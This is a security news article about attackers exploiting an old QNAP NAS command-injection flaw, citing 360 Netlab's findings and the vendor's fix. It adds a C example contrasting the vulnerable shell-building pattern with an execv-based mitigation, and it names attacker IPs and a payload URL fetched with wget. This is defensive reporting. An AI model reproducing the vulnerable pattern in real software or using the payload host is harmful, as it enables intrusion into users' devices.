Hackers are scanning the Internet for network-attached storage (NAS) devices running QNAP firmware versions affected by a remote code execution (RCE) vulnerability that the vendor fixed three years ago.
According to a report published by researchers at Qihoo 360’s Network Security Research Lab (360 Netlab), the attackers are exploiting a remote command execution vulnerability caused by a command injection issue in the firmware of QNAP NAS devices.
The researchers discovered that the issue resides in the CGI program that is invoked when a user logs out; it selects the corresponding logout function based on the field name in the Cookie.
“The problem is QPS_SID, QMS_SID and QMMS_SID do not filter special characters and directly call the snprintf function to splice the curl command string and call the system function to run the string, thus making command injection possible,” reads the report published by 360 Netlab.
An unauthenticated, remote attacker could exploit the flaw through the authLogout.cgi executable, which does not filter special characters out of the input before passing the command string to the system function. This behavior makes command injection possible and allows remote code execution.
360 Netlab’s researchers reported the flaw to QNAP PSIRT on May 13, and on August 12 the vendor confirmed that the issue had been addressed in a previous security update, but that there are still QNAP NAS devices online that have yet to be upgraded.
QNAP addressed the vulnerability with the release of firmware version 4.3.3 on July 21, 2017. The vendor’s fix replaces the function used to run the command strings.
“This release replaced the system function with qnap_exec, and the qnap_exec function is defined in the /usr/lib/libuLinux_Util.so.0,” continues 360 Netlab. “By using the execv to execute custom command, command injection has been avoided.”
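The two patterns the report contrasts, as an added illustration that is not QNAP’s code nor 360 Netlab’s: a stand-in for the vulnerable snprintf-into-system() construction, an allow-list check on the session id, and the execv-based replacement. The URL, the 64-character limit and the `prog` parameter are assumptions made for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern (a stand-in for the CGI's behaviour, not QNAP's code): the
 * session id taken from the Cookie is formatted straight into a command line that
 * would be handed to system(). The string is built here but never executed. */
int build_vulnerable_command(char *out, size_t n, const char *sid) {
    return snprintf(out, n, "curl -s http://127.0.0.1/logout?sid=%s", sid);
}

/* Shows the defect: any shell metacharacter in sid survives into the command. */
int metachar_reaches_shell(const char *sid) {
    char buf[256];
    build_vulnerable_command(buf, sizeof buf, sid);
    return strpbrk(buf, ";|&`$") != NULL;
}

/* Mitigation 1: allow-list the session id before it goes near a command
 * (assumed format: 1-64 alphanumeric characters). */
int sid_is_valid(const char *sid) {
    size_t len = strlen(sid);
    if (len == 0 || len > 64) return 0;
    for (size_t i = 0; i < len; i++)
        if (!isalnum((unsigned char)sid[i])) return 0;
    return 1;
}

/* Mitigation 2, the approach of the vendor's fix: exec the program directly with
 * an argv array, so no shell ever parses the value. prog is a hypothetical
 * parameter so the function can be exercised with any binary (e.g. /bin/true).
 * Returns the child's exit status, or -1 if the sid is rejected or fork fails. */
int run_without_shell(const char *prog, const char *sid) {
    if (!sid_is_valid(sid)) return -1;
    char url[256];
    snprintf(url, sizeof url, "http://127.0.0.1/logout?sid=%s", sid);
    char *argv[] = { (char *)prog, "-s", url, NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execv(prog, argv);   /* only returns on failure */
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Even with execv, the allow-list check still matters: the value becomes one argument to curl, so it can no longer reach a shell, but it can still be an unexpected URL.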
The researchers noticed that two attacker IPs, 22.214.171.124 and 126.96.36.199, were using the same payload, downloaded with wget from http://188.8.131.52:8096/aaa after successful exploitation.
360 Netlab pointed out that the attackers have not fully automated the attack using a botnet; for now, their true purpose remains a mystery.
“We recommend that QNAP NAS users check and update their firmwares in a timely manner and also check for abnormal processes and network connections,” the researchers conclude.
The report published by 360 Netlab includes indicators of compromise (IoCs) along with the list of all affected QNAP firmware versions.
The United States Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC) also issued a joint advisory about a massive ongoing campaign spreading the QSnatch data-stealing malware.
(SecurityAffairs – hacking, QNAP NAS)